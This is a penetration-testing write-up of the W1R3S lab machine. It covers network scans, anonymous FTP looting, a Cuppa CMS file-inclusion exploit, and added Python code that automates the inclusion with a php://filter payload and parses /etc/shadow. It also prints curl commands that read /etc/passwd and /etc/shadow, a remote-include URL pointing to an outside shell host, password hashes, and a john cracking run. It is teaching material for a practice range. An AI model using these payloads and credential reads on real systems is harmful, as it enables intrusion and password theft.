W1R3S range penetration notes
woodpecker

Information gathering
- Host discovery

```
nmap -sn 192.168.18.142/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 16:44 CST
Nmap scan report for 192.168.18.1
Host is up (0.0016s latency).
MAC Address: 30:AE:7B:E3:91:3F (Deqing Dusun Electron)
Nmap scan report for HF-LPB130.lan (192.168.18.111)
Host is up (0.92s latency).
MAC Address: 98:D8:63:D4:38:DA (Shanghai High-Flying Electronics Technology)
Nmap scan report for 192.168.18.123
Host is up (0.0017s latency).
MAC Address: 8C:AB:8E:7D:2C:F3 (Shanghai Feixun Communication)
Nmap scan report for nova_4-bb05f30450e33d1f.lan (192.168.18.165)
Host is up (0.036s latency).
MAC Address: 14:3C:C3:B7:9A:7F (Huawei Technologies)
Nmap scan report for LAPTOP-1DVA2N7.lan (192.168.18.197)
Host is up (0.00017s latency).
MAC Address: 40:74:E0:20:72:D1 (Intel Corporate)
Nmap scan report for W1R3S.lan (192.168.18.216)
Host is up (0.0013s latency).
MAC Address: 00:0C:29:53:6C:C0 (VMware)
Nmap scan report for kali.lan (192.168.18.142)
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 5.27 seconds
```

The VMware MAC on 192.168.18.216 (W1R3S.lan) marks it as the target.
- Port scan

```
nmap -sS -sV -T4 -O 192.168.18.216
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-14 16:50 CST
Nmap scan report for W1R3S.lan (192.168.18.216)
Host is up (0.00038s latency).
Not shown: 966 filtered tcp ports (no-response), 30 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:53:6C:C0 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.86 seconds
```
- Script scan (the command line was not recorded; output only)

```
Nmap scan report for W1R3S.lan (192.168.18.216)
Host is up (0.00024s latency).
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /wordpress/wp-login.php: Wordpress login page.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:53:6C:C0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 321.12 seconds
```

The Slowloris result is a heuristic ("LIKELY VULNERABLE"), not a confirmed finding, and the /wordpress/wp-login.php hit from http-enum is not followed up in these notes.
Vulnerability discovery
Port 21
Port 21 is open, so the first check is anonymous login:

```
ftp 192.168.18.216
Connected to 192.168.18.216.
220 Welcome to W1R3S.inc FTP service.
Name (192.168.18.216:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||43950|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs
drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
226 Directory send OK.
ftp>
```
Download the files with `mget` (cd into each of the three directories and `mget *`; `prompt` first turns off the per-file confirmation):

```
┌──(root㉿kali)-[~/Desktop/project/w1r3s/ftpDown]
└─# ls
01.txt  02.txt  03.txt  employee-names.txt  worktodo.txt
```
01.txt holds nothing of interest.
Decoding 02.txt

```
01ec2d8fc11c493b25029fb1f47f39ce
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
```

```
# identify the hash type
hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce
# looked up in an online MD5 database
01ec2d8fc11c493b25029fb1f47f39ce:This is not a password
# base64 decode
echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d
It is easy, but not that easy..
```
Employee information collected

```
cat employee-names.txt
The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources
```
Decoding worktodo.txt
The file is written in flipped ("upside-down") Unicode glyphs; decoded with an online tool (the tool left a few glyphs such as ı, ן and ˙ unmapped):

```
ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡ ....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
```

```
ı don't thınk thıs ıs the way to root! we have a ןot of work to do‘ stop pןayıng around˙˙˙˙
```
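The same decoding done offline, as an added example that is not part of the original notes: a glyph table maps each flipped character back to ASCII, and because the second sentence in worktodo.txt is also written right-to-left (the usual convention of flip tools) while the first is not, the decoder handles both orderings. The glyph table is the standard flipped-text alphabet; the input line is copied from the FTP dump above.

```python
# Added example, not part of the original write-up: decode the "upside-down"
# Unicode text in worktodo.txt offline rather than through a website.
# FLIP_TABLE is the usual flipped-glyph alphabet; characters not in it (o, s, x, z,
# digits, spaces) are passed through unchanged so a stray glyph cannot break decoding.
FLIP_TABLE = {
    "ɐ": "a", "q": "b", "ɔ": "c", "p": "d", "ǝ": "e", "ɟ": "f", "ƃ": "g",
    "ɥ": "h", "ı": "i", "ɾ": "j", "ʞ": "k", "ן": "l", "ɯ": "m", "u": "n",
    "d": "p", "b": "q", "ɹ": "r", "ʇ": "t", "n": "u", "ʌ": "v", "ʍ": "w",
    "ʎ": "y", ",": "'", "'": ",", "‘": ",", "’": ",", "¡": "!", "¿": "?",
    "˙": ".", "‾": "_",
}

# The line exactly as it appears in worktodo.txt (copied from the FTP dump above).
WORKTODO = "ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡ ....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ"


def unflip(text: str, reverse: bool = False) -> str:
    """Map flipped glyphs back to ASCII.

    Most flip tools also reverse the character order so the text reads
    correctly when the page is physically turned over; reverse=True undoes that.
    """
    chars = reversed(text) if reverse else text
    return "".join(FLIP_TABLE.get(c, c) for c in chars)


def decode_worktodo(line: str) -> str:
    """worktodo.txt mixes both conventions: the first sentence is flipped in
    place, the second is flipped and reversed. The run of dots that opens the
    second sentence is the boundary between them."""
    head, sep, tail = line.partition("....")
    if not sep:
        return unflip(head)
    return unflip(head).rstrip() + " " + unflip(sep + tail, reverse=True)


if __name__ == "__main__":
    print(decode_worktodo(WORKTODO))
```

Running it prints the message with every glyph resolved, including the ones the online tool left behind.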
That is everything port 21 yields.
Port 80
- A quick visit to the site turns up nothing further.
- Directory scan

```
"1","http://192.168.18.216/administrator/ --------> installation/","302"
"2","http://192.168.18.216/administrator/ --------> installation/","302"
"3","http://192.168.18.216/index.html","200"
```
- /administrator/ redirects to an installation page, which identifies the application as Cuppa CMS.
- Test the installation page.
- Start with a searchsploit lookup on kali:

```
┌──(root㉿kali)-[~/Desktop/vulhub]
└─# searchsploit cuppa cms
---------------------------------------------------------------- ---------------------
 Exploit Title                                                  |  Path
---------------------------------------------------------------- ---------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
---------------------------------------------------------------- ---------------------
Shellcodes: No Results
```
- Mirror the exploit locally and read it:

```
# copy the exploit into the current directory
searchsploit cuppa cms -m 25971
# read it
cat 25971.txt
```

```
# Exploit Title : Cuppa CMS File Inclusion
# Date : 4 June 2013
# Exploit Author : CWH Underground
# Site : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version : Beta
# Tested on : Window and Linux
(ASCII banner omitted)

#### VULNERABILITY: PHP CODE INJECTION ####
/alerts/alertConfigField.php (LINE: 22)
LINE 22: <?php include($_REQUEST["urlConfig"]); ?>

#### DESCRIPTION ####
An attacker might include local or remote PHP files or read non-PHP files with this
vulnerability. User tainted data is used when creating the file name that will be
included into the current file. PHP code in this file will be evaluated, non-PHP code
will be embedded to the output. This vulnerability can lead to full server compromise.
http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#### EXPLOIT ####
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream
For Example:
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Base64 Encode Output:
(elided)

Base64 Decode Output:
<?php
class Configuration{
    public $host = "localhost";
    public $db = "cuppa";
    public $user = "root";
    public $password = "Db@dmin";
    public $table_prefix = "cu_";
    public $administrator_template = "default";
    public $list_limit = 25;
    public $token = "OBqIPqlFWf3X";
    public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
    public $upload_default_path = "media/uploadsFiles";
    public $maximum_file_size = "5242880";
    public $secure_login = 0;
    public $secure_login_value = "";
    public $secure_login_redirect = "";
}
?>

Able to read sensitive information via File Inclusion (PHP Stream)
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
```

The Configuration.php shown there is the advisory author's own test instance, not this target. The important detail is the `php://filter/convert.base64-encode` trick: `include()` would otherwise execute a `.php` file and leak nothing, whereas the filter returns its source as base64.
- Test the file inclusion
On this target the parameter only worked when sent via POST; the `cuppa` directory in the advisory's URLs corresponds to the `administrator` directory found by the directory scan.
Test with curl on kali or with HackBar in the browser.
curl (`--data-urlencode` both encodes the path and makes the request a POST):

```
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.18.216/administrator/alerts/alertConfigField.php
```
Piping curl into html2text strips the page markup around the included file:

```
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.18.216/administrator/alerts/alertConfigField.php | html2text
```

HackBar: the same POST body sent from the browser.
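The POST exchange above, as an added example that is not part of the original notes or of Cuppa CMS: a small Python client that builds the same `urlConfig` body curl sends, optionally wraps the path in `php://filter/convert.base64-encode/resource=` so that a PHP file comes back as base64 instead of being executed by `include()`, and decodes the reply. The target URL is the one from the notes; `SAMPLE_RESPONSE` is constructed to resemble the server's reply and is modelled on the advisory's Configuration.php example; `read_source()` is the only function that touches the network.

```python
# Added example, not part of the original write-up or of Cuppa CMS: a client
# for the alertConfigField.php file inclusion. The POST body mirrors the
# curl --data-urlencode call above (the write-up found GET did not work here).
import base64
import re
import urllib.parse
import urllib.request

# Target URL from the write-up.
TARGET = "http://192.168.18.216/administrator/alerts/alertConfigField.php"

# Anything that looks like a base64 run long enough not to be a stray word.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def filter_payload(path: str) -> str:
    """Wrap a path so include() emits the file's bytes as base64 instead of executing it."""
    return "php://filter/convert.base64-encode/resource=" + path


def build_request(url: str, path: str, use_filter: bool) -> urllib.request.Request:
    """Same body curl --data-urlencode produces: urlConfig=<percent-encoded path>, sent as POST."""
    value = filter_payload(path) if use_filter else path
    body = urllib.parse.urlencode({"urlConfig": value}).encode()
    return urllib.request.Request(url, data=body, method="POST")


def decode_filter_output(body: str) -> str:
    """Pull the base64 blob out of the returned HTML and decode it.

    alertConfigField.php wraps the included content in page markup, so take the
    longest base64-looking run and repair any padding the regex did not capture.
    """
    runs = B64_RUN.findall(body)
    if not runs:
        raise ValueError("no base64 run found in response")
    blob = max(runs, key=len)
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob).decode("utf-8", "replace")


def read_source(url: str, path: str) -> str:
    """Live use (network): fetch a PHP file's source through the filter wrapper."""
    req = build_request(url, path, use_filter=True)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return decode_filter_output(resp.read().decode("utf-8", "replace"))


# Constructed sample reply, modelled on the advisory's Configuration.php example:
# what the server hands back for the php://filter request, inside page markup.
SAMPLE_CONFIG = '<?php class Configuration{ public $user = "root"; public $password = "Db@dmin"; } ?>'
SAMPLE_RESPONSE = (
    "<html><body>" + base64.b64encode(SAMPLE_CONFIG.encode()).decode() + "</body></html>"
)

if __name__ == "__main__":
    print(build_request(TARGET, "../Configuration.php", use_filter=True).data.decode())
    print(decode_filter_output(SAMPLE_RESPONSE))
    # read_source(TARGET, "../Configuration.php") would perform the live request.
```

Reading `../Configuration.php` through the filter is the step that turns a file read into database credentials; a plain include of the same path returns an empty page because the file is executed rather than displayed.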
- Grab /etc/shadow (readable because the web server runs with enough privilege on this box)

```
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://192.168.18.216/administrator/alerts/alertConfigField.php
```

```
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
```
Only three entries carry a real hash (a `*` or `!` in the second field means the account has no password to crack):

```
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
```
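The triage of the shadow dump done programmatically, as an added example that is not part of the original notes: a parser that keeps only the accounts with a crypt(3) hash, names the hash scheme from its `$6$` prefix, and converts the "days since epoch" field into a date (root's 17554 is 2018-01-23, the same date as the FTP directories). `SAMPLE_SHADOW` is a constructed excerpt of the dump above with the hashes copied verbatim.

```python
# Added example, not part of the original write-up: parse the /etc/shadow dump
# pulled through the file inclusion and keep only the accounts worth feeding
# to john. A second field of "*" or "!" (or empty) means the account has no
# crackable password; a "$6$" prefix is sha512crypt, the Ubuntu 16.04 default.
# SAMPLE_SHADOW is a constructed excerpt of the dump above (hashes copied verbatim).
from datetime import date, timedelta

HASH_PREFIXES = {
    "$1$": "md5crypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}

SAMPLE_SHADOW = """\
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
"""


def parse_shadow(text: str) -> list:
    """Split shadow lines into dicts; the hash may contain '$' and '/' but never ':'."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            continue  # malformed line: skip it rather than mis-assign fields
        entries.append({
            "user": fields[0],
            "hash": fields[1],
            "lastchg": int(fields[2]) if fields[2] else None,
        })
    return entries


def hash_algorithm(h: str):
    """Name the crypt(3) scheme from the '$id$' prefix, or None if unrecognised."""
    for prefix, name in HASH_PREFIXES.items():
        if h.startswith(prefix):
            return name
    return None


def crackable(entries: list) -> list:
    """Accounts with a real hash: locked ('!'), disabled ('*') and empty fields drop out."""
    return [
        e for e in entries
        if e["hash"] and e["hash"][0] not in "*!" and hash_algorithm(e["hash"])
    ]


def crackable_users(text: str) -> list:
    return [e["user"] for e in crackable(parse_shadow(text))]


def last_change(entry: dict) -> str:
    """Field 3 is days since 1970-01-01; on this box it matches the Jan 2018 FTP timestamps."""
    return (date(1970, 1, 1) + timedelta(days=entry["lastchg"])).isoformat()


def john_input(text: str) -> str:
    """user:hash lines in the form john loads as sha512crypt (5000 rounds when unspecified)."""
    return "\n".join(f'{e["user"]}:{e["hash"]}' for e in crackable(parse_shadow(text)))


if __name__ == "__main__":
    for e in crackable(parse_shadow(SAMPLE_SHADOW)):
        print(e["user"], hash_algorithm(e["hash"]), last_change(e))
    print(john_input(SAMPLE_SHADOW))
```

Writing `john_input()`'s output to a file gives exactly the three-line input the `john` run below loads.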
- Crack them with john (it identifies the format itself)

```
john hashdow
Created directory: /home/kali/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data         (www-data)
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer         (w1r3s)
```

Two of the three were cracked (root's was not):

```
www-data (www-data)
computer (w1r3s)
```
- SSH in as w1r3s

```
# log in
sudo ssh w1r3s@192.168.18.216
# once in, check sudo rights
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.lan:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S.lan:
    (ALL : ALL) ALL
w1r3s@W1R3S:~$ uname -a
Linux W1R3S 4.13.0-36-generic #40~16.04.1-Ubuntu SMP Fri Feb 16 23:25:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
w1r3s@W1R3S:~$ whoami
w1r3s
```

The sudo rule is `(ALL : ALL) ALL`, so `sudo -i` (or `sudo su -`) with the already-known password gives a root shell; that ends the engagement.
Summary
- On port 21
  - Three things to check on port 21:
    - anonymous login (unauthenticated access)
    - weak credentials
    - the vsftpd backdoor (only the trojaned 2.3.4 release; not applicable here, the banner reports 2.0.8 or later)
  - How port 21 is usually exploited:
    Mostly by reading what is on the share and checking it for leaked sensitive information.
- On file inclusion
  - It can read sensitive files such as /etc/shadow and /etc/passwd
  - Combined with a file upload vulnerability it can get a shell
- Overall
  - Efficiency: keep the overall approach clear (otherwise you repeat work and efficiency drops sharply), keep notes on everything collected (otherwise important details get overlooked), and do the familiar things first (they may already be enough to get a shell).
  - Methodology:
    - Host discovery first
    - For each live host, scan its ports, service versions and OS
    - Test each port (for unfamiliar ports, look up whether known vulnerabilities exist; if none, move on)
    - Clean up traces
    - Write up
  - Other: paying attention teaches you more; being weak is what makes you grow.
Other
If anything is unclear, the video below walks through it in detail:
[Red Team Notes: 100 boxes you must do to learn pentesting, hands-on explained: W1R3S] https://www.bilibili.com/video/BV1mB4y1j7K6/?share_source=copy_web&vd_source=7fa3855f45362f8b2340544a37a98ec7
Disclaimer
1. General: the technical information in this article is for reference only and does not constitute professional advice. Readers should use it with care according to their own circumstances and in compliance with the Cybersecurity Law of the People's Republic of China; the author and the publishing platform accept no liability for any direct or indirect loss arising from its use.
2. Applicability: the techniques described may not apply to every situation or system; test and evaluate them fully before real-world use. The parties involved accept no liability for problems caused by improper use.
3. Currency: technology moves quickly and the content may be out of date. Readers must judge its timeliness themselves; the author and the publishing platform accept no liability for consequences of relying on outdated content.
This article is the independent opinion of woodpecker; reproduction without authorization is prohibited.
For authorization, questions about the article, or takedown requests, contact FreeBuf customer service Xiaomifeng (WeChat: freebee1024).
2023-02-15